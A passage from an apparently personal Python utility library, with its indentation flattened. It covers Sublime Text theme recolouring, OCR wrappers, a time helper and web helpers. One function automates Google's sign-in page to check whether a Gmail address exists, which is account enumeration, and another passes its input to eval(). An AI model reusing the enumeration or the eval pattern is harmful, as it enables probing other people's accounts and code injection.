78a7b2 400939"""
list(map(print, self.saved_colour_codes.split("\n")))
self.theme_path = homepath("~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default/Monokai.tmTheme")
self.blank = '\n <!-- \x01 Maybe strings should be whitetext \x02 Functions purple? \x03 Variables blue? \x04 Numbers green? \x05 what about a very dark green for functions?-->\n <?xml version="1.0" encoding="UTF-8"?>\n <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n <plist version="1.0">\n <dict>\n <key>name</key>\n <string>Monokai</string>\n <key>settings</key>\n <array>\n <dict>\n <key>settings</key>\n <!--\n [[ Original Data ]]\n <dict>\n <key>background</key>\n <string>#__blank__</string> \n <key>caret</key>\n <string>#__blank__</string>\n <key>foreground</key>\n <string>#__blank__</string>\n <key>invisibles</key>\n <string>#__blank__</string>\n <key>lineHighlight</key>\n <string>#__blank__</string>\n <key>selection</key>\n <string>#__blank__</string>\n <key>findHighlight</key>\n <string>#__blank__</string>\n <key>findHighlightForeground</key>\n <string>#__blank__</string>\n <key>selectionBorder</key>\n <string>#__blank__</string>\n <key>activeGuide</key>\n <string>#__blank__</string>\n <key>misspelling</key>\n <string>#__blank__</string>\n <key>bracketsForeground</key>\n <string>#__blank__</string>\n <key>bracketsOptions</key>\n <string>underline</string>\n <key>bracketContentsForeground</key>\n <string>#__blank__</string>\n <key>bracketContentsOptions</key>\n <string>underline</string>\n <key>tagsOptions</key>\n <string>stippled_underline</string>\n </dict>\n -->\n <!--\n https://html-color-codes.info/old/colorpicker.html\n -->\n <dict>\n <key>background</key>\n <string>#000000</string>\n <key>caret</key>\n <string>#__blank__</string>\n <key>foreground</key>\n <string>#__blank__</string>\n <key>invisibles</key>\n <string>#__blank__</string>\n <key>lineHighlight</key>\n <string>#__blank__</string>\n <key>selection</key>\n <string>#000000</string>\n <key>findHighlight</key>\n <string>#__blank__</string>\n <key>findHighlightForeground</key>\n <string>#__blank__</string>\n <key>selectionBorder</key>\n <string>#__blank__</string>\n <key>activeGuide</key>\n <string>#__blank__</string>\n <key>misspelling</key>\n <string>#__blank__</string>\n <key>bracketsForeground</key>\n <string>#__blank__</string>\n <key>bracketsOptions</key>\n <string>underline</string>\n <key>bracketContentsForeground</key>\n <string>#__blank__</string>\n <key>bracketContentsOptions</key>\n <string>underline</string>\n <key>tagsOptions</key>\n <string>stippled_underline</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Comment</string>\n <key>scope</key>\n <string>comment</string>\n <key>settings</key>\n <!--\n [[ Original Data ]]\n <dict>\n <key>foreground</key>\n <string>#{__blank__}</string>\n </dict>\n -->\n <dict>\n <key>foreground</key>\n <string>#FF1700</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>String</string>\n <key>scope</key>\n <string>string</string>\n <key>settings</key>\n <!--\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n -->\n <dict>\n <key>foreground</key>\n <string>#__blank__</string> <!--"string here" # __blank__ string-->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Number</string>\n <key>scope</key>\n <string>constant.numeric</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n\n <dict>\n <key>name</key>\n <string>Built-in constant</string>\n <key>scope</key>\n <string>constant.language</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string> <!-- while (True)-->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>User-defined constant</string>\n <key>scope</key>\n <string>constant.character, constant.other</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string> <!-- %s -->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Variable</string>\n <key>scope</key>\n <string>variable</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Keyword</string>\n <key>scope</key>\n <string>keyword - (source.c keyword.operator | source.c++ keyword.operator | source.objc keyword.operator | source.objc++ keyword.operator), keyword.operator.word</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string> <!-- default #__blank__ import/while/for/try/except/as -->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Annotation Punctuation</string>\n <key>scope</key>\n <string>punctuation.definition.annotation</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>JavaScript Dollar</string>\n <key>scope</key>\n <string>variable.other.dollar.only.js</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Storage</string>\n <key>scope</key>\n <string>storage</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Storage type</string>\n <key>scope</key>\n <string>storage.type</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n <key>foreground</key>\n <string>#__blank__</string> <!-- default: __blank__ (class/def) -->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Entity name</string>\n <key>scope</key>\n <string>entity.name - (entity.name.filename | entity.name.section | entity.name.tag | entity.name.label)</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string> <!-- default: A6E22E class/def (function)-->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Inherited class</string>\n <key>scope</key>\n <string>entity.other.inherited-class</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>italic underline</string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Function argument</string>\n <key>scope</key>\n <string>variable.parameter - (source.c | source.c++ | source.objc | source.objc++)</string>\n <key>settings</key>\n <!--\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n -->\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n <key>foreground</key>\n <string>#__blank__</string> <!-- def hi( (kw)= ) -->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Language variable</string>\n <key>scope</key>\n <string>variable.language</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Tag name</string>\n <key>scope</key>\n <string>entity.name.tag</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Tag attribute</string>\n <key>scope</key>\n <string>entity.other.attribute-name</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Function call</string>\n <key>scope</key>\n <string>variable.function, variable.annotation</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string> <!--x.stdout.readline()) (readline()) -->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Library function</string> <!--input("Product_url?: ") #__blank__-->\n <key>scope</key>\n <string>support.function, support.macro</string>\n <key>settings</key>\n <!--\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n -->\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Library constant</string>\n <key>scope</key>\n <string>support.constant</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Library class/type</string>\n <key>scope</key>\n <string>support.type, support.class</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Library variable</string>\n <key>scope</key>\n <string>support.other.variable</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string></string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Invalid</string>\n <key>scope</key>\n <string>invalid</string>\n <key>settings</key>\n <dict>\n <key>background</key>\n <string>#000000</string>\n <key>fontStyle</key>\n <string></string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Invalid deprecated</string>\n <key>scope</key>\n <string>invalid.deprecated</string>\n <key>settings</key>\n <dict>\n <key>background</key>\n <string>#__blank__</string>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>JSON String</string>\n <key>scope</key>\n <string>meta.structure.dictionary.json string.quoted.double.json</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>YAML String</string>\n <key>scope</key>\n <string>string.unquoted.yaml</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n\n <dict>\n <key>name</key>\n <string>diff.header</string>\n <key>scope</key>\n <string>meta.diff, meta.diff.header</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup headings</string>\n <key>scope</key>\n <string>markup.heading</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>bold</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup headings</string>\n <key>scope</key>\n <string>markup.heading punctuation.definition.heading</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup h1</string>\n <key>scope</key>\n <string>markup.heading.1 punctuation.definition.heading</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup links</string>\n <key>scope</key>\n <string>markup.underline.link</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup bold</string>\n <key>scope</key>\n <string>markup.bold</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>bold</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup italic</string>\n <key>scope</key>\n <string>markup.italic</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>italic</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup bold/italic</string>\n <key>scope</key>\n <string>markup.italic markup.bold | markup.bold markup.italic</string>\n <key>settings</key>\n <dict>\n <key>fontStyle</key>\n <string>bold italic</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup hr</string>\n <key>scope</key>\n <string>punctuation.definition.thematic-break</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup blockquote</string>\n <key>scope</key>\n <string>markup.quote punctuation.definition.blockquote</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup bullets</string>\n <key>scope</key>\n <string>markup.list.numbered.bullet</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup bullets</string>\n <key>scope</key>\n <string>markup.list.unnumbered.bullet | (markup.list.numbered punctuation.definition)</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup code</string>\n <key>scope</key>\n <string>markup.raw</string>\n <key>settings</key>\n <dict>\n <key>background</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup punctuation</string>\n <key>scope</key>\n <string>markup.raw punctuation.definition.raw</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>markup punctuation</string>\n <key>scope</key>\n <string>text & (punctuation.definition.italic | punctuation.definition.bold | punctuation.definition.raw | punctuation.definition.link | punctuation.definition.metadata | punctuation.definition.image | punctuation.separator.table-cell | punctuation.section.table-header | punctuation.definition.constant)</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>diff.deleted</string>\n <key>scope</key>\n <string>markup.deleted</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>diff.inserted</string>\n <key>scope</key>\n <string>markup.inserted</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>diff.changed</string>\n <key>scope</key>\n <string>markup.changed</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>scope</key>\n <string>constant.numeric.line-number.find-in-files - match</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n <dict>\n <key>scope</key>\n <string>entity.name.filename</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n\n <dict>\n <key>scope</key>\n <string>message.error</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n </array>\n </dict>\n </plist>'
self.Monokai_color_scheme = '{\n "name": "Monokai",\n "author": "Sublime HQ Pty Ltd, Wimer Hazenberg",\n "variables":\n {\n "text": "#ffffff",\n "background": "#000000",\n "comment": "#ff1700",\n },\n "globals":\n {\n "foreground": "var(text)",\n "background": "var(background)",\n "caret": "var(text)",\n "invisibles": "var(background)",\n "line_highlight": "var(background)",\n "selection": "var(background)",\n "selection_border": "var(text)",\n "misspelling": "var(background)",\n "active_guide": "var(text)",\n "find_highlight_foreground": "var(text)",\n "find_highlight": "var(text)",\n "brackets_options": "underline",\n "brackets_foreground": "var(text)",\n "bracket_contents_options": "underline",\n "bracket_contents_foreground": "var(text)",\n "tags_options": "stippled_underline"\n }, "rules":\n [\n {\n "name": "Comment",\n "scope": "comment",\n "foreground": "var(comment)"\n },\n {\n "name": "String",\n "scope": "string",\n "foreground": "var(text)"\n },\n {\n "name": "Number",\n "scope": "constant.numeric",\n "foreground": "var(text)"\n },\n {\n "name": "Built-in constant",\n "scope": "constant.language",\n "foreground": "var(text)"\n },\n {\n "name": "User-defined constant",\n "scope": "constant.character, constant.other",\n "foreground": "var(text)"\n },\n {\n "name": "Variable",\n "scope": "variable"\n },\n {\n "name": "Keyword",\n "scope": "keyword - (source.c keyword.operator | source.c++ keyword.operator | source.objc keyword.operator | source.objc++ keyword.operator), keyword.operator.word",\n "foreground": "var(text)"\n },\n {\n "name": "Annotation Punctuation",\n "scope": "punctuation.definition.annotation",\n "foreground": "var(text)"\n },\n {\n "name": "JavaScript Dollar",\n "scope": "variable.other.dollar.only.js",\n "foreground": "var(text)"\n },\n {\n "name": "Storage",\n "scope": "storage",\n "foreground": "var(text)"\n },\n {\n "name": "Storage type",\n "scope": "storage.type",\n "foreground": "var(text)",\n "font_style": "italic"\n },\n {\n "name": "Entity name",\n "scope": "entity.name - (entity.name.filename | entity.name.section | entity.name.tag | entity.name.label)",\n "foreground": "var(text)"\n },\n {\n "name": "Inherited class",\n "scope": "entity.other.inherited-class",\n "foreground": "var(text)",\n "font_style": "italic underline"\n },\n {\n "name": "Function argument",\n "scope": "variable.parameter - (source.c | source.c++ | source.objc | source.objc++)",\n "foreground": "var(text)",\n "font_style": "italic"\n },\n {\n "name": "Language variable",\n "scope": "variable.language",\n "foreground": "var(text)",\n "font_style": "italic"\n },\n {\n "name": "Tag name",\n "scope": "entity.name.tag",\n "foreground": "var(text)"\n },\n {\n "name": "Tag attribute",\n "scope": "entity.other.attribute-name",\n "foreground": "var(text)"\n },\n {\n "name": "Function call",\n "scope": "variable.function, variable.annotation",\n "foreground": "var(text)"\n },\n {\n "name": "Library function",\n "scope": "support.function, support.macro",\n "foreground": "var(text)"\n },\n {\n "name": "Library constant",\n "scope": "support.constant",\n "foreground": "var(text)"\n },\n {\n "name": "Library class/type",\n "scope": "support.type, support.class",\n "foreground": "var(text)",\n "font_style": "italic"\n },\n {\n "name": "Library variable",\n "scope": "support.other.variable"\n },\n {\n "name": "Invalid",\n "scope": "invalid",\n "foreground": "var(text)",\n "background": "var(background)"\n },\n {\n "name": "Invalid deprecated",\n "scope": "invalid.deprecated",\n "foreground": "var(text)",\n "background": "var(background)"\n },\n {\n "name": "JSON String",\n "scope": "meta.structure.dictionary.json string.quoted.double.json",\n "foreground": "var(text)"\n },\n {\n "name": "YAML String",\n "scope": "string.unquoted.yaml",\n "foreground": "var(text)"\n },\n {\n "name": "diff.header",\n "scope": "meta.diff, meta.diff.header",\n "foreground": "var(text)"\n },\n {\n "name": "markup headings",\n "scope": "markup.heading",\n "font_style": "bold"\n },\n {\n "name": "markup headings",\n "scope": "markup.heading punctuation.definition.heading",\n "foreground": "var(text)"\n },\n {\n "name": "markup h1",\n "scope": "markup.heading.1 punctuation.definition.heading",\n "foreground": "var(text)"\n },\n {\n "name": "markup links",\n "scope": "markup.underline.link",\n "foreground": "var(text)"\n },\n {\n "name": "markup bold",\n "scope": "markup.bold",\n "font_style": "bold"\n },\n {\n "name": "markup italic",\n "scope": "markup.italic",\n "font_style": "italic"\n },\n {\n "name": "markup bold/italic",\n "scope": "markup.italic markup.bold | markup.bold markup.italic",\n "font_style": "bold italic"\n },\n {\n "name": "markup hr",\n "scope": "punctuation.definition.thematic-break",\n "foreground": "var(text)"\n },\n {\n "name": "markup blockquote",\n "scope": "markup.quote punctuation.definition.blockquote",\n "foreground": "var(text)"\n },\n {\n "name": "markup bullets",\n "scope": "markup.list.numbered.bullet",\n "foreground": "var(text)"\n },\n {\n "name": "markup bullets",\n "scope": "markup.list.unnumbered.bullet | (markup.list.numbered punctuation.definition)",\n "foreground": "color(var(text)"\n },\n {\n "name": "markup code",\n "scope": "markup.raw",\n "background": "color(var(text)"\n },\n {\n "name": "markup punctuation",\n "scope": "markup.raw punctuation.definition.raw",\n "foreground": "color(var(text)"\n },\n {\n "name": "markup punctuation",\n "scope": "text & (punctuation.definition.italic | punctuation.definition.bold | punctuation.definition.raw | punctuation.definition.link | punctuation.definition.metadata | punctuation.definition.image | punctuation.separator.table-cell | punctuation.section.table-header | punctuation.definition.constant)",\n "foreground": "color(var(text)"\n },\n {\n "name": "diff.deleted",\n "scope": "markup.deleted",\n "foreground": "var(text)"\n },\n {\n "name": "diff.inserted",\n "scope": "markup.inserted",\n "foreground": "var(text)"\n },\n {\n "name": "diff.changed",\n "scope": "markup.changed",\n "foreground": "var(text)"\n },\n {\n "scope": "constant.numeric.line-number.find-in-files - match",\n "foreground": "color(var(text)"\n },\n {\n "scope": "entity.name.filename",\n "foreground": "var(text)"\n },\n {\n "scope": "message.error",\n "foreground": "var(text)"\n }\n ]\n}'
def get_random_color_code(self):
x = [0,1,2,3,4,5,6,7,8,9,"a","b","c","d","e","f"]
import random
y = ""
for i in range(6):
y += str(random.sample(x, 1)[0])
print(y)
return y
def colorama(self, specific_colour_code = None, sleeptime=2):
try:specific_colour_code = eval(specific_colour_code)
except:pass
if specific_colour_code == "on_clipboard":
for idx, i in enumerate(pyperclip.paste().split("\n")):
with open(self.theme_path, "w") as f:
f.write(self.blank.replace("__blank__", i))
os.system("say '%s'"%idx)
time.sleep(int(sleeptime))
return
while True:
with open(self.theme_path, "w") as f:
if specific_colour_code == None:
f.write(self.blank.replace("__blank__", self.get_random_color_code()))
else:
f.write(self.blank.replace("__blank__", specific_colour_code))
return
time.sleep(int(sleeptime))
def change_colours(self, color_code = None):
print(json.dumps(self.discovered_colours, indent=4))
with open(self.theme_path, "w") as f:
f.write(self.blank.replace("__blank__", color_code))
def change_comment_colours(self, color_code = None):
with open(self.theme_path, "r") as f:
x = f.read()
with open(self.theme_path, "w") as f:
f.write(x.replace("FF1700", color_code))
def change_background_colour(self, color_code = None):
with open(self.theme_path, "r") as f:
x = f.read()
with open(self.theme_path, "w") as f:
f.write(x.replace("000000", color_code))
def normal(self):
SublimeText_Normal_text = ExecutableText().export("SublimeText_Normal_text")
with open(self.theme_path, "w") as f:
f.write(SublimeText_Normal_text)
def argh_text(self, hex="ffffff"):
hex=(self.get_random_color_code())if(None==hex)else(hex)
self.hexes[-1].argh_text = hex
R = homepath("~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default/Monokai.sublime-color-scheme")
F = re.sub(r'"text": "#.*', '"text": "#%s",' % (hex), open(R,"r").read())
open(R, "w").write(F)
def argh2_comments(self, hex="ffffff"):
hex=(self.get_random_color_code())if(None==hex)else(hex)
self.hexes[-1].argh2_comments = hex
R = homepath("~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default/Monokai.sublime-color-scheme")
F = re.sub(r'"comment": "#.*', '"comment": "#%s",' % (hex), open(R,"r").read())
open(R, "w").write(F)
def argh_background(self, hex="000000"):
hex=(self.get_random_color_code())if(None==hex)else(hex)
self.hexes[-1].argh_background = hex
R = homepath("~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default/Monokai.sublime-color-scheme")
F = re.sub(r'"background": "#.*', '"background": "#%s",' % (hex), open(R,"r").read())
open(R, "w").write(F)
def argh_colorama(self, text = True, comments = True, background = False, direction = None):
if direction is not None:
if direction == "left":
self.current_idx = self.current_idx - 1 if (self.current_idx - 1) >= 0 else self.current_idx
if text: self.argh_text(self.hexes[self.current_idx].argh_text)
if comments: self.argh2_comments(self.hexes[self.current_idx].argh2_comments)
if background: self.argh_background(self.hexes[self.current_idx].argh_background)
elif direction == "right":
self.current_idx = self.current_idx + 1 if (self.current_idx + 1) < len(self.hexes) else self.current_idx
if text: self.argh_text(self.hexes[self.current_idx].argh_text)
if comments: self.argh2_comments(self.hexes[self.current_idx].argh2_comments)
if background: self.argh_background(self.hexes[self.current_idx].argh_background)
return
self.hexes.append(AttrDict())
self.current_idx = len(self.hexes) - 1
if text == True:
self.argh_text(hex = None)
elif text != False:
self.argh_text(hex = text)
if comments == True:
self.argh2_comments(hex = None)
elif comments != False:
self.argh2_comments(hex = comments)
if background == True:
self.argh_background(hex = None)
elif background != False:
self.argh_background(hex = background)
def argh_norm(self):
R = homepath("~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default/Monokai.sublime-color-scheme")
open(R, "w").write(self.Monokai_color_scheme)
class Tesseract:
def __init__(self):
import pytesseract
import textract
import pyocr
from PIL import Image
globals().update({k:v for k,v in locals().items() if "self" != k})
def pytesseract(self, x):
x = Images().download(x) if not os.path.exists(x) else x
if(None==x):return(None)#@Added Because It Could Be Images.Download Hits 404 Returns None,
[setitem(globals(), "img", Image.open(x)), setitem(globals(), "img", globals()["img"].convert("L")), globals()["img"].save(x)]
x = pytesseract.image_to_string(Image.open(x)).strip()
redprint("[result\n][%s]"%x)
return x
def textract(self, x):
x = Images().download(x) if not os.path.exists(x) else x
if(None==x):return(None)#@Added Because It Could Be Images.Download Hits 404 Returns None,
[setitem(globals(), "img", Image.open(x)), setitem(globals(), "img", globals()["img"].convert("L")), globals()["img"].save(x)]
x = textract.process(x, encoding='ascii', method='tesseract').decode().strip()
redprint("[result\n][%s]"%x)
return x
def pyocr(self, x):
x = Images().download(x) if not os.path.exists(x) else x
if(None==x):return(None)#@Added Because It Could Be Images.Download Hits 404 Returns None,
[setitem(globals(), "img", Image.open(x)), setitem(globals(), "img", globals()["img"].convert("L")), globals()["img"].save(x)]
x = pyocr.get_available_tools()[0].image_to_string(Image.open(x), builder=pyocr.builders.TextBuilder()).strip()
redprint("[result\n][%s]"%x)
return x
class TestClass(int):
def __new__(cls, *args, **kwargs):
return super(TestClass, cls).__new__(cls, 5)
"""
print(TestClass())
"""
class Time(object):
def __init__(self, _str=None):
if or_list(_str,[],None) == None: _str = datetime.now()
self.timestr = (self.parse_date(_str).strftime("%Y-%m-%d %H:%M:%S"))if(type(_str)==str)else(_str.strftime("%Y-%m-%d %H:%M:%S"))
self.timeobj = (self.parse_date(_str))if(type(_str)==str)else(_str)
def parse_date(self,w,remove_tzinfo=True,localize_timezone=False):
import dateutil.parser
x = dateutil.parser.parse(w)
y = x.astimezone()if(localize_timezone==True)else(x)
z = y.replace(tzinfo=None)if(remove_tzinfo==True)else(y)
def strftime(self, srftime_string):
return self.timeobj.strftime(srftime_string)
def __repr__(self):
return self.timestr
def __sub__(self, _str):
if type(_str) == int:
return Time(self.timeobj - timedelta(_str))
else:
x = (self.timeobj - _str.timeobj)
class Timedelta(object):
def __init__(self, x):
self.timedelta = x
self.days = self.timedelta.days#
self.microseconds = self.timedelta.microseconds#
self.seconds = self.timedelta.seconds#
def hours(self):#
return int(self.total_seconds() / 3600)
def minutes(self):#
return int(self.total_seconds() / 60)
def total_seconds(self):#
return self.timedelta.total_seconds()
def total_minutes(self):
return int(self.total_seconds() / 60) + (round( ((self.total_seconds() % 60)/60),2))
return Timedelta(x)
def __add__(self, _str):
if type(_str) == int:
return Time(self.timeobj + timedelta(_str))
def __lt__(self, _str):
return self.timeobj < _str.timeobj
def __gt__(self, _str):
return self.timeobj > _str.timeobj
def __eq__(self, _str):
return self.timeobj == _str.timeobj
def __call__(self):
return self.timeobj
def date(self):
return self.timeobj
def str(self):
return self.timestr
class TrueFalseStatements:
def __init__(self):
pyperclip.copy(
"""
In [292]: '''1 0 0 0 1 0 1 1 1 1 1 1 0 1 0 0 1'''
Out[292]: '1 0 0 0 1 0 1 1 1 1 1 1 0 1 0 0 1'
In [293]: def true():return [print('true'),1][1]
In [294]: def false():return [print('false'),0][1]
In [295]: def truth():return [print('true'),1][1]
In [296]: [print('t'),1][1] and ([print('f'),0][1] or [print('t'),1][1])
t
f
t
Out[296]: 1
In [297]: true() and (false() or false() or false() or true()) and (false() or true()) and true() and true() and true() and true() and true() and (false(
...: ) or true()) and (false() or false() or true())
true
false
false
false
true
false
true
true
true
true
true
true
false
true
false
false
true
Out[297]: 1
In [298]: '1 and (false or false or false or truth) and (false or truth) and tru and tru and tru and tru and tru and (fls or tru) and (f f t)'
Out[298]: '1 and (false or false or false or truth) and (false or truth) and tru and tru and tru and tru and tru and (fls or tru) and (f f t)'
""" . replace('\n ',''))
""" Internet-Utils """
def BeautifulSoup(x, y="lxml"):
from bs4 import BeautifulSoup as BeautifulSoup
return BeautifulSoup(x, "lxml")
def SOUP(x, y="lxml"):
from bs4 import BeautifulSoup as SOUP
return SOUP(x, "lxml")
def SOUPY(soup,x=None,y=None,z=None):
import bs4
if type(soup) != bs4.BeautifulSoup: soup = BeautifulSoup(str(soup))
if x==None: return soup
return(soup.findAll(x)if(None==y==z)else(soup.findAll(x,attrs={y:z})))
def addressurl(url, part = 0):
return ("%s%s.png" % (Replacements(address_normalize(url), "/", " "), (":%s:"%(part))if(part!=0)else("") ))
"""
ss = Browser()("sele")
ss.get("google.com")
assert addressurl(ss.current_url, part = 0) == "https: www.google.com.png"
assert addressurl(ss.current_url, part = 1) == "https: www.google.com:1:.png"
"""
def bitly_url(url):
return json.loads(requests.get("https://api-ssl.bitly.com/v3/shorten?access_token={}&longUrl={}".format(Muta()().bitly_access_token, url)).text)["data"]["url"]
"""
bitly_url("https://google.com")
"""
def blocktext_to_session_headers(x):
x=x.strip().split("\n")
x={i.split(": ",1)[0] if not i.split(": ",1)[0].startswith(":") else(i.split(": ",1)[0][1:]):i.split(": ")[1] for i in x }
return x
def check_gmail_account_exists(x):
ss = Browser()("ph")
ss.get("https://accounts.google.com/signin/v2/identifier")
blueprint("got page")
ss.ffs("input","type","email").send_keys(x).sp(2)
blueprint("entered in email")
ss.jtns("span","click",{"text":"Next"}).sp(5)
blueprint("clicked next button")
exists = None
if "/pwd" in ss.current_url:
blueprint(ss.current_url)
exists = True # exists
else:
exists = False
ss.quit()
return exists
"""
blueprint(check_gmail_account_exists("test"))
blueprint(check_gmail_account_exists("asjdgasjgepawokgepak"))
"""
def cookies_to_database(username,website_name,cookies=None,reverse=True):
# return Binarydata().update_or_create([pickle.dump(cookies,open("%s|%s|Cookies.ini"%(username,website_name),"wb")),"%s|%s|Cookies.ini"%(username,website_name)][1])if(reverse==False)else([Binarydata().export("%s|%s|Cookies.ini"%(username,website_name)),pickle.load(open("%s|%s|Cookies.ini"%(username,website_name),"rb")),rm("%s|%s|Cookies.ini"%(username,website_name)) ][1])
return Binarydata().update_or_create([pickle.dump(cookies,open("%s|%s|Cookies.ini"%(username,website_name),"wb")),"%s|%s|Cookies.ini"%(username,website_name)][1])if(reverse==False)else([Binarydata().export("%s|%s|Cookies.ini"%(username,website_name)),pickle.load(open("%s|%s|Cookies.ini"%(username,website_name),"rb")), ][1])
def cookies_to_session(cookies, session):
for cookie in cookies:
session.cookies.set(cookie['name'], cookie['value'])
return session
def firefox65_do(executable_string):
